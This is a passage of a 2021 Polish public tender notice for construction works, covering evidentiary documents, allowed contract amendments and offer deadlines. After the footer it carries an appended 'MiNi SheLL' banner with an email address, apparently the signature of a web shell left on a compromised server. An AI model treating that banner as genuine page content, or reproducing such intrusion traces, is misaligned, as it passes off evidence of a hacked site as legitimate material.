zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej<br/>samej grupy kapitałowej,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane o treści ZAŁĄCZNIKA NR 6 do SWZ, oraz<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>UWAGA: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz zawiera roboty budowlane, w wykonaniu których wykonawca<br/>bezpośrednio uczestniczył,<br/>- wykaz osób, skierowanych przez wykonawce do realizacji zamówienia publicznego wraz z informacjami<br/>na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami o treści ZAŁĄCZNIKA NR 7<br/>do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ. Jeżeli Wykonawca polega na zasobach podmiotu trzeciego, składa również to oświadczenie w zakresie podstaw wykluczenia w odniesieniu do tego podmiotu (oświadczenia tego nie składa podmiot trzeci!). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> wykonawca wpisany do urzędowego wykazu zatwierdzonych wykonawców lub wykonawca<br/>certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może,<br/>zamiast odpowiednich podmiotowych środków dowodowych, złożyć zaświadczenie o wpisie<br/>do urzędowego wykazu wydane przez właściwy organ lub certyfikat wydany przez właściwą jednostkę<br/>certyfikującą kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wskazujące<br/>na podmiotowe środki dowodowe stanowiące podstawę wpisu lub uzyskania certyfikacji, chyba ze<br/>zamawiający ma uzasadnione podstawy do zakwestionowania informacji wynikających<br/>z zaświadczenia lub certyfikatu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiajacy okresla nastepujace warunki, w jakich przewiduje mozliwosc dokonania zmian zawartej<br/>umowy. Dopuszcza sie zmiany postanowien zawartej umowy w przypadkach:<br/>1) działania siły wyzszej i wynikajacej z tego zmiany terminu wykonania robót,<br/>2) wystapienia warunków atmosferycznych uniemozliwiajacych wykonywanie robót i wynikajacej z tego zmiany<br/>terminu wykonania robót. Fakt ten musi zostac zgłoszony pisemnie Zamawiajacemu<br/>3) wystapienia obiektywnych przesłanek zaakceptowanych przez Zamawiajacego i wynikajacej z tego zmiany<br/>terminu wykonania robót,<br/>4) nadzwyczajnych zdarzen gospodarczych niezaleznych od Zamawiajacego, których Zamawiajacy nie mógł<br/>przewidziec w chwili zawarcia umowy i wynikajacej z tego zmiany terminu wykonania robót,<br/>5) decyzji słuzb konserwatorskich lub Nadzoru budowlanego majacych wpływ na przesuniecie terminu<br/>realizacji robót takich jak wstrzymanie budowy, koniecznosc wykonania prac archeologicznych (badan<br/>archeologicznych),<br/>6) wystapienia zdarzen na które strony nie maja wpływu, a które uniemozliwiaja przy normalnym tempie prac<br/>wykonanie umowy w terminie i wynikajacej z tego zmiany terminu wykonania robót,<br/>7) zawieszenia, rezygnacji przez Zamawiajacego wykonania czesci lub całosci robót i wynikajacej z tego<br/>zmiany terminu wykonania robót<br/>8) braków lub wad w dokumentacji projektowej lub innych dokumentach budowy i wynikajacej z tego zmiany<br/>terminu wykonania robót,<br/>9) rezygnacji z wykonania czesci robót i/lub wykonanie robót zamiennych oraz wynikajacej z tego zmiany<br/>terminu wykonania robót i wartosci wynagrodzenia umownego,<br/>10) zmiany zakresu robót wynikajacych z decyzji administracyjnych i wykonanie robót zamiennych oraz<br/>wynikajacej z tego zmiany terminu wykonania robót i wartosci wynagrodzenia umownego,<br/>11) podpisania aneksu o roboty dodatkowe, o których mowa w art. 455 ust.1 pkt.3 ustawy Prawo zamówien<br/>publicznych, nie objetych zamówieniem podstawowym<br/>12) zmian bedacych nastepstwem okolicznosci lezacych po stronie Zamawiajacego, w szczególnosci<br/>wstrzymanie robót przez Zamawiajacego i wynikajacej z tego zmiany terminu wykonania robót,<br/>13) zmian wynikajacych z koniecznosci wykonania robót niezwiazanych bezposrednio z przedmiotem umowy<br/>i nieprzewidywalnych, których brak wykonania uniemozliwia lub utrudnia prawidłowe wykonanie przedmiotu<br/>umowy i wynikajacej z tego zmiany terminu wykonania robót,<br/>14) odmiennych od przyjetych w dokumentacji projektowej warunków terenowych, w szczególnosci istnienie<br/>niezinwentaryzowanych obiektów budowlanych, sieci lub instalacji i wynikajacej z tego zmiany terminu<br/>wykonania robót,<br/>15) skrócenia terminu realizacji przedmiotu umowy - na wniosek Wykonawcy,<br/>16) zmiany przedstawicieli uczestników procesu inwestycyjnego,<br/>17) nieterminowego przekazania placu budowy, lub poszczególnych frontów robót i wynikajacej z tego zmiany<br/>terminu wykonania robót<br/>18) zmiany technologii wykonania robót, lub zmiana materiałów, jezeli nowe rozwiazania beda korzystne dla<br/>Zamawiajacego, przy zachowaniu niepogorszonych standardów jakosciowych,<br/>19) aktualizacji rozwiazan projektowych z uwagi na postep technologiczny, zmian obowiazujacych przepisów,<br/>warunków uniemozliwiajacych prowadzenie robót, bezpieczenstwa pracy, a takze zmian wynikajacych z innych nieprzewidywalnych istotnych okolicznosci<br/>itd.. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”,</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com